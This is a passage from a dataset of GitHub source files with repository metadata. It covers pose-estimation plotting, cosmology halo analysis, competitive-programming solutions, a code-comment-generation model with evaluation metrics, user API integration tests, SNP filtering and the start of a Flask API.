scaler\n y_2d, x_2d = joints_2d[joint_num][:]\n joint_x = hm_pt_interp_bilinear(x_hm[:, :, joint_num], \n hm_factor,\n (y_2d, x_2d)) * scaler\n joint_y = hm_pt_interp_bilinear(y_hm[:, :, joint_num], \n hm_factor,\n (y_2d, x_2d)) * scaler\n joint_z = hm_pt_interp_bilinear(z_hm[:, :, joint_num], \n hm_factor,\n (y_2d, x_2d)) * scaler\n joints_3d[joint_num, :] = [joint_x, joint_y, joint_z]\n # Subtract the root location to normalize the data\n joints_3d -= joints_3d[14, :]\n return joints_3d\n\n\ndef draw_limbs_2d(img, joints_2d, limb_parents, rect):\n # draw skeleton\n for limb_num in range(len(limb_parents)):\n x1 = joints_2d[limb_num, 0]\n y1 = joints_2d[limb_num, 1]\n x2 = joints_2d[limb_parents[limb_num], 0]\n y2 = joints_2d[limb_parents[limb_num], 1]\n length = ((x1 - x2) ** 2 + (y1 - y2) ** 2) ** 0.5\n deg = math.degrees(math.atan2(x1 - x2, y1 - y2))\n # here round() returns float type, so use int() to convert it to integer type\n polygon = cv2.ellipse2Poly((int(round((y1+y2)/2)), int(round((x1+x2)/2))),\n (int(length/2), 3),\n int(deg),\n 0, 360, 1)\n img = cv2.fillConvexPoly(img, polygon, color=(49, 22, 122))\n # draw rectangle\n x, y, w, h = rect\n pt1 = (x, y)\n pt2 = (x + w, y + h)\n cv2.rectangle(img, pt1, pt2, (60, 66, 207), 4)\n\n return img\n\n\ndef draw_limbs_3d(joints_3d, joint_parents):\n fig = plt.figure()\n ax_3d = plt.axes(projection='3d')\n ax_3d.clear()\n ax_3d.view_init(-90, -90)\n ax_3d.set_xlim(-500, 500)\n ax_3d.set_ylim(-500, 500)\n ax_3d.set_zlim(-500, 500)\n ax_3d.set_xticks([])\n ax_3d.set_yticks([])\n ax_3d.set_zticks([])\n white = (1.0, 1.0, 1.0, 0.0)\n ax_3d.w_xaxis.set_pane_color(white)\n ax_3d.w_yaxis.set_pane_color(white)\n ax_3d.w_xaxis.line.set_color(white)\n ax_3d.w_yaxis.line.set_color(white)\n ax_3d.w_zaxis.line.set_color(white)\n for i in range(joints_3d.shape[0]):\n x_pair = [joints_3d[i, 0], joints_3d[joint_parents[i], 0]]\n y_pair = [joints_3d[i, 1], joints_3d[joint_parents[i], 1]]\n z_pair = [joints_3d[i, 2], joints_3d[joint_parents[i], 2]]\n ax_3d.plot(x_pair, y_pair, zs=z_pair, linewidth=3)\n plt.ion()\n plt.show()\n\n\nclass PoseAnimation3d:\n def __init__(self, ax, joint_parents):\n self.joint_parents = joint_parents\n self.ax = ax\n self.ax.view_init(-90, -90)\n self.ax.set_xlim(-500, 500)\n self.ax.set_ylim(-500, 500)\n self.ax.set_zlim(-500, 500)\n self.ax.set_xticks([])\n self.ax.set_yticks([])\n self.ax.set_zticks([])\n white_color = (1.0, 1.0, 1.0, 0.0)\n self.ax.w_xaxis.set_pane_color(white_color)\n self.ax.w_yaxis.set_pane_color(white_color)\n self.ax.w_xaxis.line.set_color(white_color)\n self.ax.w_yaxis.line.set_color(white_color)\n self.ax.w_zaxis.line.set_color(white_color)\n self.skeletons = [self.ax.plot([], [], [], '-', linewidth=3)[0] for _ in range(21)]\n\n def ani_init(self):\n for skeleton in self.skeletons:\n skeleton.set_data(np.array([]), np.array([]))\n skeleton.set_3d_properties(np.array([]))\n return self.skeletons\n\n def __call__(self, joints_3d):\n for i, skeleton in enumerate(self.skeletons):\n x_pair = np.array([joints_3d[i, 0], joints_3d[self.joint_parents[i], 0]])\n y_pair = np.array([joints_3d[i, 1], joints_3d[self.joint_parents[i], 1]])\n z_pair = np.array([joints_3d[i, 2], joints_3d[self.joint_parents[i], 2]])\n skeleton.set_data(x_pair, y_pair)\n skeleton.set_3d_properties(z_pair)\n return self.skeletons\n\n\ndef plot_3d_init(joint_parents, joints_iter_gen):\n fig = plt.figure()\n ax = plt.axes(projection='3d')\n ani_update = PoseAnimation3d(ax, joint_parents)\n global ani\n ani = FuncAnimation(fig, ani_update, frames=joints_iter_gen, init_func=ani_update.ani_init, interval=20, blit=True)\n plt.ion()\n plt.show()\n\n\ndef plot_3d(q_start3d, q_joints, joint_parents):\n q_start3d.get()\n\n def joints_iter_gen_inner():\n while 1:\n yield q_joints.get(True)\n\n fig = plt.figure()\n ax = plt.axes(projection='3d')\n ani_update = PoseAnimation3d(ax, joint_parents)\n global ani\n ani = FuncAnimation(fig, ani_update, frames=joints_iter_gen_inner, init_func=ani_update.ani_init, interval=15,\n blit=True)\n plt.show()\n\n\ndef gen_heatmap(img_shape, center, sigma=3):\n img_height, img_width = img_shape\n heatmap = np.zeros((img_height, img_width), dtype=np.float32)\n center_x, center_y = center\n th = 4.6052\n delta = math.sqrt(th * 2)\n x0 = int(max(0, center_x - delta * sigma))\n y0 = int(max(0, center_y - delta * sigma))\n x1 = int(min(img_width, center_x + delta * sigma))\n y1 = int(min(img_height, center_y + delta * sigma))\n for y in range(y0, y1):\n for x in range(x0, x1):\n d = (x - center_x) ** 2 + (y - center_y) ** 2\n exp = d / 2.0 / sigma / sigma\n if exp > th:\n continue\n # heatmap[y][x] = np.clip(heatmap[y][x], math.exp(-exp), 1.0)\n heatmap[y, x] = math.exp(-exp)\n return heatmap\n","repo_name":"XinArkh/VNect","sub_path":"src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":14150,"program_lang":"python","lang":"en","doc_type":"code","stars":236,"dataset":"github-code","pt":"61"} +{"seq_id":"72567690754","text":"import os, sys\nimport numpy as np\nimport h5py as h5\nimport matplotlib.pyplot as plt\n\ncosmo_dir = '/home/bruno/Desktop/Dropbox/Developer/cosmo_sims/'\ntoolsDirectory = cosmo_dir + \"tools/\"\nsys.path.append( toolsDirectory )\nfrom halo_finder import find_halos\nfrom plot_halos import plot_halos_positions\nfrom load_halo_catalogs import load_asciiFiles\nfrom mass_function import get_mass_function\n\n\ndataDir = '/home/bruno/Desktop/data/'\ninDir = dataDir + 'cosmo_sims/cholla_pm/cosmo_256_dm/'\nhalos_dir = inDir + 'halos/'\noutDir = inDir\n\nsnapshots = [19]\n# Load Rockstar Catalogs\nrks_data_all = load_asciiFiles( snapshots, 8, halos_dir )\n\nLbox = 115e3\nn_slice = 64\nnSnap = 19\n\nfile_name = 'mass_function_{0}.png'.format(nSnap)\ncumulative = True\n\nfig = plt.figure(0)\nplt.clf()\nax = plt.gca()\n\n# # for nSnap in range(19, 20):\n# print \"n_nSnap: \", nSnap\n# inFileName = 'data/particles_{0}_1.h5'.format(nSnap)\n# inFile = h5.File( inDir + inFileName )\n# dens = inFile['density'][...]\n# inFile.close()\n# \n# dens = dens[:n_slice,:,:]\n# \n# halo_limit = dens.mean() * 172\n# dens_limit = dens.mean() * 1\n# halo_catalog = find_halos( Lbox, dens, dens_limit, halo_limit )\n# h_mass = halo_catalog[:,2]\n# pos_x = halo_catalog[:,4]\n# pos_y = halo_catalog[:,5]\n# pos_z = halo_catalog[:,6]\n# plot_halos_positions( Lbox, halo_catalog, dens, outDir, nSnap )\n# binCenters, massFunction = get_mass_function(h_mass, 1, comulative=cumulative, nBins=40)\n# ax.plot( binCenters, massFunction )\n\nrks_data = rks_data_all[nSnap]\nh_mass = rks_data['mvir']\nbinCenters, massFunction = get_mass_function(h_mass, 1, comulative=cumulative, nBins=40)\nax.plot( binCenters, massFunction, label='Rockstar')\n\n\nax.set_xlabel(r'Mass $[{\\rm h^{-1} M_{\\odot}}]$', fontsize=15 )\nif cumulative: ax.set_ylabel(r'n(>M) $[h^3{\\rm Mpc^{-3}}]$', fontsize=15 )\nelse: ax.set_ylabel(r'n $[h^3{\\rm Mpc^{-3}}]$', fontsize=15 )\nax.legend( loc=1, prop={'size':13} )\nax.set_title('Cumulative Halo Mass function z=0', fontsize=15)\nax.set_xscale('log')\nax.set_yscale('log')\nfig.savefig(outDir + file_name, bbox_inches='tight')\n","repo_name":"bvillasen/cosmo_sims","sub_path":"halo_analysis/find_halos.py","file_name":"find_halos.py","file_ext":"py","file_size_in_byte":2063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"42969719959","text":"def d(s):\n return len(list(str(s)))\n\n\na, b, x = map(int, input().split())\n\n\ndef bin_search():\n INF = 10 ** 9\n if a * INF + b * d(INF) <= x:\n return INF\n\n pl = 0\n pr = INF\n while True:\n pc = (pl + pr) // 2\n if x-1 < a * pc + b * d(pc) <= x:\n return pc\n elif a * pc + b * d(pc) > x:\n pr = pc - 1\n else:\n pl = pc + 1\n if pl > pr:\n break\n while pr > 0:\n if a * pr + b * d(pr) <= x:\n return pr\n pr -= 1\n return 0\n\n\nprint(bin_search())\n","repo_name":"Okabe-Junya/AtCoderArchive","sub_path":"ABC/101-150/146/c.py","file_name":"c.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5247489500","text":"import copy\nimport json\nimport math\nimport os\nimport pickle\nimport re\nimport javalang\nimport nltk\nimport numpy as np\nimport tensorflow as tf\nfrom config import *\nfrom model import *\nfrom rouge_score import rouge_scorer\n\n\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\n# nltk.download('punkt')\n\n\ndef split_identifier(identifier: str):\n \"\"\"\n Usage:\n 1. \"camelCase\" -> [\"camel\", \"Case\"]\n 2. \"snake_case\" -> [\"snake\", \"_\", \"case\"]\n 3. \"normal\" -> [\"normal\"]\n \"\"\"\n if \"_\" in identifier:\n return identifier.split(\"_\")\n elif identifier != identifier.lower() and identifier != identifier.upper():\n # regular expression for camelCase\n matches = re.finditer(\n '.+?(?:(?<=[a-z])(?=[A-Z])|(?<=[A-Z])(?=[A-Z][a-z])|$)',\n identifier\n )\n return [m.group(0) for m in matches]\n return [identifier]\n\n\ndef get_batch(inp: list, batch_sz: int):\n \"\"\"\n Return shape:\n [None, batch_sz, None]\n Example:\n a = [1,2,3,4,5,6,7,8,9,10]\n a = getBatch(inp=a, batch_sz=3)\n ---output---\n [[1,2,3], [4,5,6], [7,8,9]]\n \"\"\"\n dataset = []\n while len(inp) >= batch_sz:\n dataset.append(inp[:batch_sz])\n inp = inp[batch_sz:]\n if isinstance(inp, np.ndarray):\n return np.array(dataset)\n return dataset\n\n\ndef ngram(words, n):\n return list(zip(*(words[i:] for i in range(n))))\n\n\ndef code_tokenize(code):\n inputs = []\n tokens_parse = javalang.tokenizer.tokenize(code)\n for token in tokens_parse:\n token = str(token).split(' ')\n # split the camelCase and snake_case\n splitted_id = split_identifier(token[1].strip('\"'))\n inputs.extend(splitted_id)\n inputs.insert(0, '')\n inputs.append('')\n return inputs\n\n\ndef token_to_index(seq, voc):\n \"\"\"\n ['public', 'void', ... ''] -> [55, 66, ..., 2]\n \"\"\"\n seq_index = []\n for token in seq:\n if token not in voc:\n seq_index.append(voc.index(''))\n else:\n seq_index.append(voc.index(token))\n return seq_index\n\n\ndef token_zero_padding(seq, voc, max_length):\n # index of '' is 0\n seq += [voc.index('')] * (max_length - len(seq))\n seq = np.array(seq)\n return seq\n\n\ndef greedy_search(code, encoder, decoder, train_data):\n code = code_tokenize(code)\n if len(code) >= train_data['max_length_code']:\n code = code[:train_data['max_length_code']-1]\n code = token_to_index(code, train_data['code_voc'])\n code = token_zero_padding(code, train_data['code_voc'], train_data['max_length_code'])\n code = tf.expand_dims(code, 0)\n result = ''\n hidden = encoder.initialize_hidden_state(batch_sz=1)\n enc_output, enc_hidden_h, enc_hidden_c = encoder(code, hidden)\n dec_hidden = [enc_hidden_h, enc_hidden_c]\n dec_input = tf.expand_dims([train_data['comment_voc'].index('')], 1)\n\n for t in range(train_data['max_length_com']):\n predictions, dec_hidden_h, dec_hidden_c = decoder(dec_input, dec_hidden, enc_output)\n dec_hidden = [dec_hidden_h, dec_hidden_c]\n predicted_id = tf.argmax(predictions[0]).numpy()\n if train_data['comment_voc'][predicted_id] == '':\n return result\n result += train_data['comment_voc'][predicted_id] + ' '\n # the predicted ID is fed back into the model\n dec_input = tf.expand_dims([predicted_id], 0)\n\n return result\n\n\ndef predict_word_for_each_candidate(pred_info, decoder, enc_output, comment_voc, width):\n \"\"\"\n it is called by beam search,\n it predicts one words for each of 'width * width' candidates,\n and also handle the joint scores, hidden states of decorder, etc.\n \"\"\"\n cand_info = []\n for i in range(width):\n for x in range(width):\n cand_info += [copy.deepcopy(pred_info[i])]\n\n if pred_info[i]['end'] is True:\n continue\n\n predictions, dec_hidden_h, dec_hidden_c = decoder(\n pred_info[i]['dec_input'],\n pred_info[i]['dec_hidden'],\n enc_output\n )\n pred_info[i]['dec_hidden'] = [dec_hidden_h, dec_hidden_c]\n predictions = tf.nn.softmax(predictions)\n # pick out top k new words for each prediction comments\n topk_score = tf.math.top_k(predictions[0], width)[0]\n topk_id = tf.math.top_k(predictions[0], width)[1]\n\n for x in range(width):\n cand_info[width*i+x]['scores'] *= topk_score[x].numpy()\n if comment_voc[topk_id[x].numpy()] == '':\n cand_info[width*i+x]['end'] = True\n else:\n cand_info[width*i+x]['gen_comments'] += comment_voc[topk_id[x].numpy()] + ' '\n cand_info[width*i+x]['dec_input'] = tf.expand_dims([topk_id[x].numpy()], 0)\n cand_info[width*i+x]['dec_hidden'] = pred_info[i]['dec_hidden']\n\n return cand_info, pred_info\n\n\ndef beam_search(code, encoder, decoder, train_data, width):\n code = code_tokenize(code)\n code = token_to_index(code, train_data['code_voc'])\n code = token_zero_padding(code, train_data['code_voc'], train_data['max_length_code'])\n code = tf.expand_dims(code, 0)\n\n hidden = encoder.initialize_hidden_state(batch_sz=1)\n enc_output, enc_hidden_h, enc_hidden_c = encoder(code, hidden)\n # pred_info : a list having 'width' elements, each element represent one prediction comment\n pred_info = []\n for i in range(width):\n pred_info.append({\n 'gen_comments': '',\n 'scores': 1,\n 'end': False, # used to determine whether the prediction comments end\n 'dec_input': tf.expand_dims([train_data['comment_voc'].index('')], 1),\n 'dec_hidden': [enc_hidden_h, enc_hidden_c]\n })\n\n for t in range(train_data['max_length_com']):\n # cand_info : a list having 'width * width' elements\n cand_info, pred_info = predict_word_for_each_candidate(\n pred_info,\n decoder,\n enc_output,\n train_data['comment_voc'],\n width\n )\n # because the candidate of 1st iteration must be all the same\n if t == 0:\n pred_info = cand_info[:width]\n continue\n else:\n sorted_index = sorted(range(width ** 2), key=lambda k: cand_info[k]['scores'], reverse=True)[:width]\n # pick first 'width' best candidate comments as the temporary predictions\n for x in range(width):\n pred_info[x] = cand_info[sorted_index[x]]\n if False not in [pred_info[x]['end'] for x in range(width)]:\n break\n # select the comments with the highest joint scores as prediction\n return pred_info[0]['gen_comments']\n\n\ndef read_train_pkl():\n \"\"\"\n return a dict(), having several training data information\n \"\"\"\n f = open('./simplified_dataset/train_ComCNN_data.pkl', 'rb')\n code_train, comment_train, code_voc, comment_voc = pickle.load(f)\n code_voc_size = len(code_voc)\n com_voc_size = len(comment_voc)\n max_length_code = max(len(t) for t in code_train)\n max_length_com = max(len(t) for t in comment_train)\n train_data = {\n 'code': code_train,\n 'comment': comment_train,\n 'code_voc': code_voc,\n 'comment_voc': comment_voc,\n 'code_voc_size': code_voc_size,\n 'com_voc_size': com_voc_size,\n 'max_length_code': max_length_code,\n 'max_length_com': max_length_com\n }\n return train_data\n\n\ndef read_testset(**kwargs):\n \"\"\"\n return a list of many dicts having 'code' and 'comment' keys\n \"\"\"\n if \"path\" in kwargs:\n f = open(kwargs['path'])\n else:\n f = open('./simplified_dataset/simplified_test.json')\n inputs = f.readlines()\n f.close()\n test_data = []\n\n for pair in inputs:\n pair = json.loads(pair)\n test_data.append({'code': pair['code'], 'comment': pair['nl']})\n\n return test_data\n\n\ndef bleu(true, pred, n):\n true = nltk.word_tokenize(true)\n pred = nltk.word_tokenize(pred)\n c = len(pred)\n r = len(true)\n bp = 1. if c > r else np.exp(1 - r / (c + 1e-10))\n score = 0\n\n for i in range(1, n+1):\n true_ngram = set(ngram(true, i))\n pred_ngram = ngram(pred, i)\n if len(true_ngram) == 0 or len(pred_ngram) == 0:\n break\n length = float(len(pred_ngram)) + 1e-10\n count = sum([1. if t in true_ngram else 0. for t in pred_ngram])\n score += math.log(1e-10 + (count / length))\n # n就是公式的Wn\n score = math.exp(score / n)\n bleu = bp * score\n return bleu\n\n\ndef tf_idf(ngram_list, ngram, total_ngram_count):\n count = ngram_list.count(ngram)\n tf = count / total_ngram_count\n # in our dataset, tf-idf is either (tf*1) or (0* every large number)\n # so idf=1 results in the same consequence\n idf = 1\n return tf * idf\n\n\ndef cider(true, pred):\n true = nltk.word_tokenize(true)\n pred = nltk.word_tokenize(pred)\n N = 4\n cider_score = 0\n for n in range(1, 5):\n true_ngram = ngram(true, n)\n pred_ngram = ngram(pred, n)\n if len(true_ngram) == 0 or len(pred_ngram) == 0:\n break\n\n total_ngram = true_ngram + pred_ngram\n total_ngram_count_in_cand = 1e-10\n total_ngram_count_in_ref = 1e-10\n\n for t in set(total_ngram):\n total_ngram_count_in_cand += pred_ngram.count(t)\n total_ngram_count_in_ref += true_ngram.count(t)\n g_cand = [tf_idf(pred_ngram, t, total_ngram_count_in_cand) for t in set(total_ngram)]\n g_ref = [tf_idf(true_ngram, t, total_ngram_count_in_ref) for t in set(total_ngram)]\n\n # inner product of two list\n g = sum([a*b for a, b in zip(g_cand, g_ref)])\n abs_cand = sum([a**2 for a in g_cand]) ** 0.5\n abs_ref = sum([a**2 for a in g_ref]) ** 0.5\n cider_score += (g / (abs_cand * abs_ref)) / N\n return cider_score\n\n\ndef get_checkpoint_dir():\n checkpoint_dir = ''\n if ARCH == \"lstm_lstm\":\n checkpoint_dir = './training_checkpoints/ComCNN-lstm-lstm'\n elif ARCH == \"cnnlstm_lstm\":\n checkpoint_dir = './training_checkpoints/ComCNN-cnnlstm-lstm'\n elif ARCH == \"cnnbilstm_lstm\":\n checkpoint_dir = './training_checkpoints/ComCNN-cnnbilstm-lstm'\n else:\n print('Error: get_checkpoint_dir')\n exit(0)\n return checkpoint_dir\n\n\ndef restore_model(encoder, decoder):\n checkpoint_dir = get_checkpoint_dir()\n optimizer = tf.optimizers.Adam(learning_rate=1e-3)\n checkpoint = tf.train.Checkpoint(optimizer=optimizer, encoder=encoder, decoder=decoder)\n checkpoint.restore(tf.train.latest_checkpoint(checkpoint_dir)).expect_partial()\n return encoder, decoder\n\n\ndef integrated_prediction(code, encoder, decoder, train_data, beam_k, method):\n if method == 'greedy':\n predict = greedy_search(code, encoder, decoder, train_data)\n elif method == 'beam_3' or method == 'beam_5':\n predict = beam_search(code, encoder, decoder, train_data, beam_k)\n return predict\n\n\ndef integrated_score(metric, test_output, predict):\n score = 0\n if metric == 'BLEU3':\n score = bleu(test_output, predict, 3)\n elif metric == 'BLEU4':\n score = bleu(test_output, predict, 4)\n elif metric == 'CIDEr':\n score = cider(test_output, predict)\n elif metric == 'ROUGE_L':\n scorer = rouge_scorer.RougeScorer(['rougeL'], use_stemmer=False)\n score = scorer.score(test_output, predict)['rougeL'].fmeasure\n return score\n\n\ndef create_model(vocab_inp_size, vocab_tar_size, max_length_inp):\n if ARCH == \"lstm_lstm\":\n encoder = lstmEncoder(vocab_inp_size, EMBEDDING_DIM, UNITS)\n decoder = Decoder(vocab_tar_size, EMBEDDING_DIM, UNITS)\n elif ARCH == \"cnnlstm_lstm\":\n encoder = cnnlstmEncoder(vocab_inp_size, EMBEDDING_DIM, UNITS, max_length_inp)\n decoder = Decoder(vocab_tar_size, EMBEDDING_DIM, UNITS)\n elif ARCH == \"cnnbilstm_lstm\":\n encoder = cnnbilstmEncoder(vocab_inp_size, EMBEDDING_DIM, FILTERS, max_length_inp)\n decoder = Decoder(vocab_tar_size, EMBEDDING_DIM, FILTERS)\n\n return encoder, decoder\n","repo_name":"yurong0404/ComCNN","sub_path":"util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":12133,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"32731873103","text":"# https://www.acmicpc.net/problem/2231\n\nn = int(input())\n\nfor number in range(1,n+1):\n # sum과 map을 이용하면 더 빠르다.\n # compare = number + sum(map(int, str(number)))\n\n compare = number \n for digit in str(number):\n compare += int(digit)\n if compare == n:\n print(number)\n break\nelse:\n print(0)","repo_name":"ghleokim/codeTestProblems","sub_path":"baekjoon/2231_bruteForce.py","file_name":"2231_bruteForce.py","file_ext":"py","file_size_in_byte":344,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1233137944","text":"import pytest\n\nfrom model.responses.image_responses import CreateImageResponse\nfrom model.responses.user import UserHandlerResponse, GetUserByEmailResponse, GetUserByEmailResult\nfrom model.user_schemas import RequestUser, UserSchema\nfrom test.utils.utils import get_random_string\n\npytestmark = pytest.mark.asyncio\n\n\nasync def test_create_login_get_update_delete(test_client, unauthenticated, ensure_db_schema: None):\n new_username = f\"test_user_{get_random_string()}@gmail.com\"\n token = (\n await test_client.post(\n url=\"/users/\",\n req_body=RequestUser(\n parameter=UserSchema(\n email=new_username,\n password=\"1234\",\n phone_number=new_username,\n full_name=new_username,\n )\n ),\n resp_model=UserHandlerResponse,\n )\n ).result[\"token\"]\n response = await test_client.get(\n url=f\"/users/{new_username}\", resp_model=GetUserByEmailResponse, headers={\"Authorization\": f\"Bearer {token}\"}\n )\n assert response.result == GetUserByEmailResult(\n full_name=new_username,\n email=new_username,\n car_color=None,\n phone_number=new_username,\n car_model=None,\n plate_number=None,\n )\n response = await test_client.put(\n url=f\"/users/update\",\n req_body=RequestUser(parameter=UserSchema(full_name=\"Tznon Metoonaf\")),\n resp_model=UserHandlerResponse,\n headers={\"Authorization\": f\"Bearer {token}\"},\n )\n del response.result[\"password\"]\n assert response == UserHandlerResponse(\n code=200,\n status=\"OK\",\n message=\"User updated successfully\",\n result={\n \"full_name\": \"Tznon Metoonaf\",\n \"email\": new_username,\n \"car_color\": None,\n \"phone_number\": new_username,\n \"car_model\": None,\n \"plate_number\": None,\n },\n detail=None,\n )\n assert (\n await test_client.delete(\n url=\"/users/delete\", resp_model=UserHandlerResponse, headers={\"Authorization\": f\"Bearer {token}\"}\n )\n ) == UserHandlerResponse(code=200, status=\"OK\", message=\"User deleted successfully\", result=None, detail=None)\n\n\nasync def test_validate_user(test_user, test_client, ensure_db_schema: None):\n token, new_username = test_user.token, test_user.email\n resp = await test_client.get(\n url=\"/users/validate_token\", resp_model=UserHandlerResponse, headers={\"Authorization\": f\"Bearer {token}\"}\n )\n assert resp.code == 200\n # assert resp.result == {\"is_valid\": True}\n\n\nasync def test_get_user_with_image(test_client, test_user, ensure_db_schema: None):\n token, new_username = test_user.token, test_user.email\n with open(\"test/resources/image-upload.png\", mode=\"rb\") as f:\n image_resp = await test_client.post(\n url=\"/images/upload\",\n req_body=None,\n resp_model=CreateImageResponse,\n files={\"image\": (\"Charmander\", f)},\n headers={\"Authorization\": f\"Bearer {token}\"},\n )\n\n user_response = await test_client.get(\n url=f\"/users/{new_username}\", resp_model=GetUserByEmailResponse, headers={\"Authorization\": f\"Bearer {token}\"}\n )\n\n assert user_response.result.image_url == f\"/images/{image_resp.id}\"\n\n await test_client.get(f\"/images/{image_resp.id}\", headers={\"Authorization\": f\"Bearer {token}\"})\n","repo_name":"talaloni2/driveup-backend","sub_path":"test/integration/test_users.py","file_name":"test_users.py","file_ext":"py","file_size_in_byte":3445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"36763300787","text":"import os\nimport sys\nfrom pathlib import Path\n\n\ndef print_count(countValue):\n # Use a breakpoint in the code line below to debug your script.\n print(f'Total Count: {countValue}') # Press Ctrl+F8 to toggle the breakpoint.\n\n\ndef SolveDay1PartA(filepath):\n currentCount = 0\n previousValue = 99999999\n with open(filepath, \"r\") as openedFile:\n fileData = openedFile.readlines()\n\n for fileLine in fileData:\n currentValue = int(fileLine)\n if currentValue > previousValue:\n currentCount += 1\n previousValue = currentValue\n return currentCount\n\ndef SolveDay1PartB(filepath):\n currentCount = 0\n\n with open(filepath, \"r\") as openedFile:\n fileData = openedFile.readlines()\n\n index = 0\n while index < len(fileData) - 3:\n currentSum = int(fileData[index]) + int(fileData[index+1]) + int(fileData[index+2])\n nextSum = int(fileData[index+1]) + int(fileData[index+2]) + int(fileData[index+3])\n if nextSum > currentSum:\n currentCount += 1\n index += 1\n return currentCount\n\n\nif len(sys.argv) != 2:\n quit()\n#day1FilePathPartA = sys.argv[1]\n#totalCount = SolveDay1(day1FilePath)\n\nday1FilePathPartB = sys.argv[1]\ntotalCount = SolveDay1PartB(day1FilePathPartB)\nprint_count(totalCount)\n","repo_name":"JSarasua/AdventOfCode2021","sub_path":"Source/Day1.py","file_name":"Day1.py","file_ext":"py","file_size_in_byte":1287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22347316470","text":"# encoding: utf-8\n\"\"\"\n8_calculate.py\nget sites:1. present in all three bio replicates in the same branch\n 2. not present in all eight branch\n\nCreated by www on 12:57 am, May 18, 2019\n\"\"\"\nimport numpy as np\nimport sys\nimport os\nimport gzip\nimport copy\n\ndef loadFile(inputFile, o, snps, sample, mask):\n sites = 0\n with gzip.open(inputFile, 'rt') as f:\n for line in f:\n if line[0] == '#':\n continue\n line = line.strip()\n if not line:\n continue\n #the end of file, can't find another method\n if line.startswith('TBI'):\n break\n #print(line)\n info = line.split()\n ref = info[0]\n alt = info[4]\n pos = int(info[1])\n #remove site in repeat or homoploymer regions\n if mask[ref][pos - 1] != 0:\n continue\n if not pos in snps[ref]:\n snps[ref][pos] = {}\n if not alt in snps[ref][pos]:\n snps[ref][pos][alt] = {}\n snps[ref][pos][alt][sample] = ''\n sites += 1\n o.write('%s\\t%d\\n' % (sample, sites))\n return snps\n\ndef output(samples, o, d):\n snps = {}\n diffSites = 0\n\n o.write('Number of SNP sites in all three replicates in the same branch\\n')\n\n for ID in samples:\n commonThreeRep = 0\n for ref in samples[ID]:\n if not ref in snps:\n snps[ref] = {}\n for pos in samples[ID][ref]:\n #if have more than two genotype, remove. (keep site: A/A, A/T, if the site is A/A, A/T, A/C, remove)\n if len(samples[ID][ref][pos]) != 1:\n continue\n #get SNP exist in all 3 bio replicates\n for alt in samples[ID][ref][pos]:\n if len(samples[ID][ref][pos][alt]) == 3:\n commonThreeRep += 1\n if not pos in snps[ref]:\n snps[ref][pos] = {}\n if not alt in snps[ref][pos]:\n snps[ref][pos][alt] = {}\n snps[ref][pos][alt][ID] = ''\n o.write('%s\\t%d\\n' % (ID, commonThreeRep))\n\n\n for ref in snps:\n for pos in snps[ref]:\n #if have more than two genotype, remove. (keep site: A/A, A/T, if the site is A/A, A/T, A/C, remove)\n if len(snps[ref][pos]) != 1:\n continue\n for alt in snps[ref][pos]:\n if len(snps[ref][pos][alt]) == 8:\n #print('All samples have the same alt')\n #print(ref, pos, alt, snps[ref][pos][alt])\n continue\n diffSites += 1\n d.write('%s\\t%s\\t%s\\t' % (ref, alt, pos))\n for ID in snps[ref][pos][alt]:\n d.write('%s,' % ID)\n d.write('\\n')\n o.write('Number of SNP sites do not co-exist in all 8 branches\\n%d\\n' % diffSites)\n\n\ndef loadRef(refFile, removeFile):\n refs = {}\n mask = {}\n with open(refFile) as f:\n for line in f:\n info = line.split()\n ref = info[0]\n length = int(info[1])\n refs[ref] = {}\n mask[ref] = np.zeros(length)\n with open(removeFile) as f:\n for line in f:\n info = line.split()\n ref = info[0]\n start = int(info[1])\n end = int(info[2])\n mask[ref][start - 1 : end] = 1\n\n return mask, refs\n\n\ndef main():\n inputDir = 'result/5_filter/'\n outputFile = 'result/5_filter/summary'\n outputDetail= 'result/5_filter/detail_site'\n removeFile = 'ref/masked/Epau.repeat.hmopolymer.sort.bed'\n refFile = 'ref/Epau.fa.fai'\n\n o = open(outputFile, 'w+')\n d = open(outputDetail, 'w+')\n\n samples = {}\n o.write('Number of SNP sites in each sample in the same branch\\n')\n\n f = os.walk(inputDir)\n\n mask, refs = loadRef(refFile, removeFile)\n\n for root, dirs, names in f:\n for name in names:\n if not 'snp.filter.biall.vcf.gz' in name:\n continue\n if name.split('.')[-1] == 'tbi':\n continue\n inputFile = os.path.join(root, name)\n\n #sample: A_1, A_2,...H_3\n sample = name.split('.snp')[0]\n #ID: A B C D E ... H\n ID = sample.split('_')[0]\n if not ID in samples:\n samples[ID] = copy.deepcopy(refs)\n\n samples[ID] = loadFile(inputFile, o, samples[ID], sample, mask)\n\n output(samples, o, d)\n\n o.close()\n d.close()\n\nif __name__ == '__main__':\n main()\n","repo_name":"asdcid/12-trees","sub_path":"removeRepeatSiteAndCalculate.py","file_name":"removeRepeatSiteAndCalculate.py","file_ext":"py","file_size_in_byte":4737,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"5193557628","text":"#!/usr/bin/python3\n\"\"\"\nCreates a Flask application instance\n\"\"\"\n\nfrom flask import Flask, jsonify\nfrom models import storage\nimport os\n\napp = Flask(__name__)\n\n@app.teardown_appcontext\ndef close_storage(error):\n storage.close()\n\n@app.route('/api/v1/status')\ndef status():\n \"\"\"Returns the status of the API\"\"\"\n return jsonify({\"status\": \"OK\"})\n\n@app.errorhandler(404)\ndef not_found(error):\n return jsonify({\"error\": \"Not found\"}), 404\n\nif __name__ == \"__main__\":\n from api.v1.views import app_views\n app.register_blueprint(app_views)\n app.run(host=os.getenv('HBNB_API_HOST', '0.0.0.0'),\n port=int(os.getenv('HBNB_API_PORT', 5000)),\n 